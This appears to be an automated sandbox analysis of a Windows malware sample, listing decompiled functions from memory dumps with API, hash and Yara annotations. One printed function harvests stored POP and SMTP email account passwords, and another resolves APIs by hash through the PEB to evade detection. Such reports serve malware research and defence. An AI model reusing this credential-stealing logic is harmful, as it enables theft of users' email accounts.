                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403B64(WCHAR* _a4) {
                    				int _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                    				_t3 = PathFileExistsW(_a4); // executed
                    				return _t3;
                    			}

                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • closesocket.WS2_32(00404EB0,?,00404EB0,00000000), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403F9E(void* _a4) {
                    				int _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                    				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                    				return _t3;
                    			}

                    APIs
                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,F53ECACB,00000000,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406472(long _a4) {
                    				void* _t3;
                    				void* _t4;
                    
                    				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                    				Sleep(_a4); // executed
                    				return _t3;
                    			}

                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004058EA(char* _a4, char* _a8) {
                    				char* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                    				_t4 = StrStrA(_a4, _a8); // executed
                    				return _t4;
                    			}

                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405924(WCHAR* _a4, WCHAR* _a8) {
                    				WCHAR* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                    				_t4 = StrStrW(_a4, _a8); // executed
                    				return _t4;
                    			}

                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 88%
                    			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v44;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t40;
                    				intOrPtr _t45;
                    				intOrPtr _t47;
                    				void* _t71;
                    				void* _t75;
                    				void* _t77;
                    
                    				_t72 = _a4;
                    				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                    				_t81 = _t71;
                    				if(_t71 != 0) {
                    					_push(__ebx);
                    					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                    					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                    					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                    					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                    					_v8 = _v8 & 0x00000000;
                    					_v20 = _t40;
                    					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                    					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                    					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                    					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                    					_v12 = _v12 & 0x00000000;
                    					_v32 = _t45;
                    					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                    					_t77 = _t75 + 0x50;
                    					_v36 = _t47;
                    					if(_v8 != 0 || _v12 != 0) {
                    						E00405872( *0x49f934, _t71, 1, 0);
                    						E00405872( *0x49f934, _t67, 1, 0);
                    						_t74 = _v16;
                    						E00405872( *0x49f934, _v16, 1, 0);
                    						E00405781( *0x49f934, _v40);
                    						E00405872( *0x49f934, _v20, 1, 0);
                    						_push(_v8);
                    						E00405762(_v16,  *0x49f934, _v24);
                    						E00405872( *0x49f934, _v28, 1, 0);
                    						E00405781( *0x49f934, _v44);
                    						E00405872( *0x49f934, _v32, 1, 0);
                    						_push(_v12);
                    						E00405762(_t74,  *0x49f934, _v36);
                    						_t77 = _t77 + 0x88;
                    					} else {
                    						_t74 = _v16;
                    					}
                    					E0040471C(_t71);
                    					E0040471C(_t67);
                    					E0040471C(_t74);
                    					E0040471C(_v20);
                    					E0040471C(_v24);
                    					E0040471C(_v28);
                    					E0040471C(_v32);
                    					E0040471C(_v36);
                    				}
                    				return 1;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040317B(intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				void* __ecx;
                    				intOrPtr _t17;
                    				void* _t21;
                    				intOrPtr* _t23;
                    				void* _t26;
                    				void* _t28;
                    				intOrPtr* _t31;
                    				void* _t33;
                    				signed int _t34;
                    
                    				_push(_t25);
                    				_t1 =  &_v8;
                    				 *_t1 = _v8 & 0x00000000;
                    				_t34 =  *_t1;
                    				_v8 =  *[fs:0x30];
                    				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                    				_t31 = _t23;
                    				do {
                    					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                    					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                    					_pop(_t26);
                    					_t35 = _t28;
                    					if(_t28 == 0) {
                    						goto L3;
                    					} else {
                    						E004032EA(_t35, _t28, 0);
                    						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                    						_t33 = _t33 + 0x14;
                    						if(_a4 == _t21) {
                    							_t17 = _v12;
                    						} else {
                    							goto L3;
                    						}
                    					}
                    					L5:
                    					return _t17;
                    					L3:
                    					_t31 =  *_t31;
                    				} while (_t23 != _t31);
                    				_t17 = 0;
                    				goto L5;
                    			}


                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • #8.OLEAUT32(?), ref: 004043C4
                    • #2.OLEAUT32(?), ref: 004043CD
                    • #8.OLEAUT32(?,?,?,?,?), ref: 00404414
                    • #2.OLEAUT32(?,?,?,?,?), ref: 00404419
                    • #8.OLEAUT32(?,?,?,?,?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: CreateInitializeInstance
                    • String ID:
                    • API String ID: 3519745914-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Uniqueness

                    Uniqueness Score: -1.00%